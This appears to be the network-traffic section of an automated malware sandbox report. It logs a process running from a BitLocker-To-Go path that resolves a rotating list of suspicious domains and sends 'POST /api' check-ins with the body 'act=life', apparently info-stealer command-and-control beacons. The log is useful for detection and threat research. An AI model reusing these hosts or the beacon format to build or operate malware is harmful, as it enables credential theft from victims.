Oct 2, 2024 15:10:59.923207045 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.923219919 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:10:59.923731089 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:10:59.924968958 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.924984932 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.925046921 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:11:00.404822111 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:11:00.404968023 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:11:00.405025005 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:11:00.405252934 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:11:00.405252934 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:11:00.405276060 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:11:00.405286074 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:11:00.461047888 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.461086035 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:00.461180925 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.461544037 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.461556911 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:00.986438036 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:00.986581087 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.988240957 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.988249063 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:00.988583088 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:00.989949942 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.989979029 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:00.990035057 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:01.532421112 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:01.532560110 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:01.532620907 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:01.532757044 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:01.532774925 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:01.532787085 CEST	49720	443	192.168.2.5	104.21.84.18
Oct 2, 2024 15:11:01.532792091 CEST	443	49720	104.21.84.18	192.168.2.5
Oct 2, 2024 15:11:01.551306963 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:01.551352024 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:01.551414013 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:01.551772118 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:01.551784039 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.027134895 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.027352095 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.029175043 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.029190063 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.029721022 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.074215889 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.093585968 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.095505953 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.095577002 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.551615000 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.551872969 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.551956892 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.551997900 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.552016973 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.552028894 CEST	49721	443	192.168.2.5	172.67.183.74
Oct 2, 2024 15:11:02.552035093 CEST	443	49721	172.67.183.74	192.168.2.5
Oct 2, 2024 15:11:02.593219042 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:02.593267918 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:02.593386889 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:02.593708992 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:02.593720913 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.068393946 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.068531036 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.070281982 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.070295095 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.070631981 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.071919918 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.071954966 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.072005987 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.859131098 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.859231949 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.859312057 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.859536886 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.859560966 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.859581947 CEST	49722	443	192.168.2.5	104.21.21.3
Oct 2, 2024 15:11:03.859589100 CEST	443	49722	104.21.21.3	192.168.2.5
Oct 2, 2024 15:11:03.885449886 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:03.885502100 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:03.885596037 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:03.885910034 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:03.885930061 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.068609953 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.068741083 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.072221994 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.072237015 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.072493076 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.073843956 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.073870897 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.073911905 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.776648045 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.776887894 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.776956081 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.777014017 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.777030945 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.777046919 CEST	49723	443	192.168.2.5	104.21.17.174
Oct 2, 2024 15:11:05.777051926 CEST	443	49723	104.21.17.174	192.168.2.5
Oct 2, 2024 15:11:05.787189007 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:05.787220001 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:05.787288904 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:05.787775993 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:05.787790060 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.462207079 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.462280989 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:06.463958025 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:06.463968039 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.464206934 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.465554953 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:06.511421919 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.952034950 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.952064991 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.952080965 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.952176094 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:06.952220917 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:06.952245951 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:06.952281952 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.049990892 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.050034046 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.050148964 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.050173998 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.050220013 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055371046 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.055476904 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055494070 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.055516958 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.055532932 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055563927 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055717945 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055733919 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.055744886 CEST	49724	443	192.168.2.5	104.102.49.254
Oct 2, 2024 15:11:07.055749893 CEST	443	49724	104.102.49.254	192.168.2.5
Oct 2, 2024 15:11:07.066731930 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.066781044 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:07.066870928 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.067219973 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.067236900 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:07.556231976 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:07.556317091 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.557895899 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.557905912 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:07.558473110 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:07.560070038 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.560107946 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:07.560189962 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:08.192841053 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:08.192986965 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:08.193049908 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:08.193285942 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:08.193306923 CEST	443	49725	172.67.209.193	192.168.2.5
Oct 2, 2024 15:11:08.193327904 CEST	49725	443	192.168.2.5	172.67.209.193
Oct 2, 2024 15:11:08.193334103 CEST	443	49725	172.67.209.193	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 15:10:56.286098003 CEST	55488	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:10:56.301806927 CEST	53	55488	1.1.1.1	192.168.2.5
Oct 2, 2024 15:10:57.431974888 CEST	54593	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:10:57.446655035 CEST	53	54593	1.1.1.1	192.168.2.5
Oct 2, 2024 15:10:58.381864071 CEST	52385	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:10:58.402225971 CEST	53	52385	1.1.1.1	192.168.2.5
Oct 2, 2024 15:10:59.398942947 CEST	61849	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:10:59.411514044 CEST	53	61849	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:00.426318884 CEST	57355	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:00.436117887 CEST	53	57355	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:00.438877106 CEST	49983	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:00.460001945 CEST	53	49983	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:01.535933018 CEST	50631	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:01.550231934 CEST	53	50631	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:02.553231955 CEST	60799	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:02.592281103 CEST	53	60799	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:03.867156029 CEST	59131	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:03.884529114 CEST	53	59131	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:05.778345108 CEST	50591	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:05.786465883 CEST	53	50591	1.1.1.1	192.168.2.5
Oct 2, 2024 15:11:07.057075977 CEST	65469	53	192.168.2.5	1.1.1.1
Oct 2, 2024 15:11:07.065808058 CEST	53	65469	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 15:10:56.286098003 CEST	192.168.2.5	1.1.1.1	0x6002	Standard query (0)	nurserrsjwuwq.shop	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:57.431974888 CEST	192.168.2.5	1.1.1.1	0x5bb3	Standard query (0)	questionsmw.store	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:58.381864071 CEST	192.168.2.5	1.1.1.1	0xc701	Standard query (0)	soldiefieop.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:59.398942947 CEST	192.168.2.5	1.1.1.1	0x36fd	Standard query (0)	abnomalrkmu.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:00.426318884 CEST	192.168.2.5	1.1.1.1	0xe4f4	Standard query (0)	chorusarorp.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:00.438877106 CEST	192.168.2.5	1.1.1.1	0x29dd	Standard query (0)	treatynreit.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:01.535933018 CEST	192.168.2.5	1.1.1.1	0x3435	Standard query (0)	snarlypagowo.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:02.553231955 CEST	192.168.2.5	1.1.1.1	0x8945	Standard query (0)	mysterisop.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:03.867156029 CEST	192.168.2.5	1.1.1.1	0x1054	Standard query (0)	absorptioniw.site	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:05.778345108 CEST	192.168.2.5	1.1.1.1	0x8009	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:07.057075977 CEST	192.168.2.5	1.1.1.1	0x6b8	Standard query (0)	gravvitywio.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 15:10:56.301806927 CEST	1.1.1.1	192.168.2.5	0x6002	No error (0)	nurserrsjwuwq.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:56.301806927 CEST	1.1.1.1	192.168.2.5	0x6002	No error (0)	nurserrsjwuwq.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:57.446655035 CEST	1.1.1.1	192.168.2.5	0x5bb3	No error (0)	questionsmw.store		172.67.208.141	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:57.446655035 CEST	1.1.1.1	192.168.2.5	0x5bb3	No error (0)	questionsmw.store		104.21.77.132	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:58.402225971 CEST	1.1.1.1	192.168.2.5	0xc701	No error (0)	soldiefieop.site		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:58.402225971 CEST	1.1.1.1	192.168.2.5	0xc701	No error (0)	soldiefieop.site		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:59.411514044 CEST	1.1.1.1	192.168.2.5	0x36fd	No error (0)	abnomalrkmu.site		104.21.56.150	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:10:59.411514044 CEST	1.1.1.1	192.168.2.5	0x36fd	No error (0)	abnomalrkmu.site		172.67.152.190	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:00.436117887 CEST	1.1.1.1	192.168.2.5	0xe4f4	Name error (3)	chorusarorp.site	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:00.460001945 CEST	1.1.1.1	192.168.2.5	0x29dd	No error (0)	treatynreit.site		104.21.84.18	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:00.460001945 CEST	1.1.1.1	192.168.2.5	0x29dd	No error (0)	treatynreit.site		172.67.184.196	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:01.550231934 CEST	1.1.1.1	192.168.2.5	0x3435	No error (0)	snarlypagowo.site		172.67.183.74	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:01.550231934 CEST	1.1.1.1	192.168.2.5	0x3435	No error (0)	snarlypagowo.site		104.21.18.193	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:02.592281103 CEST	1.1.1.1	192.168.2.5	0x8945	No error (0)	mysterisop.site		104.21.21.3	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:02.592281103 CEST	1.1.1.1	192.168.2.5	0x8945	No error (0)	mysterisop.site		172.67.195.67	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:03.884529114 CEST	1.1.1.1	192.168.2.5	0x1054	No error (0)	absorptioniw.site		104.21.17.174	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:03.884529114 CEST	1.1.1.1	192.168.2.5	0x1054	No error (0)	absorptioniw.site		172.67.177.186	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:05.786465883 CEST	1.1.1.1	192.168.2.5	0x8009	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:07.065808058 CEST	1.1.1.1	192.168.2.5	0x6b8	No error (0)	gravvitywio.store		172.67.209.193	A (IP address)	IN (0x0001)	false
Oct 2, 2024 15:11:07.065808058 CEST	1.1.1.1	192.168.2.5	0x6b8	No error (0)	gravvitywio.store		104.21.16.12	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

nurserrsjwuwq.shop

questionsmw.store

soldiefieop.site

abnomalrkmu.site

treatynreit.site

snarlypagowo.site

mysterisop.site

absorptioniw.site

steamcommunity.com

gravvitywio.store

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	188.114.97.3	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:10:56 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: nurserrsjwuwq.shop
2024-10-02 13:10:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:10:57 UTC	776	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9bdeebh0j9f2j5bj1jp5j8g3nl; expires=Sun, 26 Jan 2025 06:57:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cetAYXl0rJYQGMc4X0FUs7YErLFlj7AhtT1UozFtP%2B4uzuW5uIvFhOR3Y9scqYzmTjmLsuH9OdvNrsGgup39zENz9LeLk%2BHmIy%2FiJEYyBDJ1e2mkh3Ofngi%2F9sSqWioGg%2FK0ohQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef7e89f84319-EWR
2024-10-02 13:10:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:10:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	172.67.208.141	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:10:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionsmw.store
2024-10-02 13:10:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:10:58 UTC	776	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qvvuvqsegdam6tmioqct1qnomm; expires=Sun, 26 Jan 2025 06:57:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMWaNae2W4RF%2FPfqoeNJGck4Rkd6O4x57rLbnqOKtZHkm2OBCfuECG2WOufiJd%2B4hbaTTV380kudcojwLkYRFAjkqs4ps4VJR5MyivIUc1FkwD%2FgyVRyRIaYx6%2Bunu19Lyi0Tw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef84897d7ca2-EWR
2024-10-02 13:10:58 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:10:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	188.114.97.3	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:10:58 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soldiefieop.site
2024-10-02 13:10:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:10:59 UTC	774	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v8vqu0jhou4ocq3qhmstrhqatv; expires=Sun, 26 Jan 2025 06:57:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdaGzm%2BwcCbaNJizccdz55dU0He%2FnlmO%2BqP%2F2e20JS8PNpkRJAwy9lgtk6IYg6%2F5SWq1SIbG10Rbn2y%2B8%2FzpVJcKP8iFT7R0rYHVCyAcMLK5Up7kN1ziPt30cze2mmtzLjRY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef8a9b84c35b-EWR
2024-10-02 13:10:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:10:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49719	104.21.56.150	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:10:59 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abnomalrkmu.site
2024-10-02 13:10:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 13:11:00 UTC	764	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 13:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0ms9ta6ds3c0pe1pnqrlds7m7s; expires=Sun, 26 Jan 2025 06:57:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxFSuxF2YHaMLfM3315G9RRF0z2JQDqil2i8Bk6khcZehq0IDmFMm9WslPy2Z7sEaa%2BbiCNN%2BHJvoofo4o9eABzU0YrsbzzvtNcWonX3ftH43aFRGr7vUjQ4qn4jE2vn3zZ9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc4ef910c3d7288-EWR
2024-10-02 13:11:00 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 13:11:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49720	104.21.84.18	443	4396	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 13:11:00 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treatynreit.site
2024-10-02 13:11:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
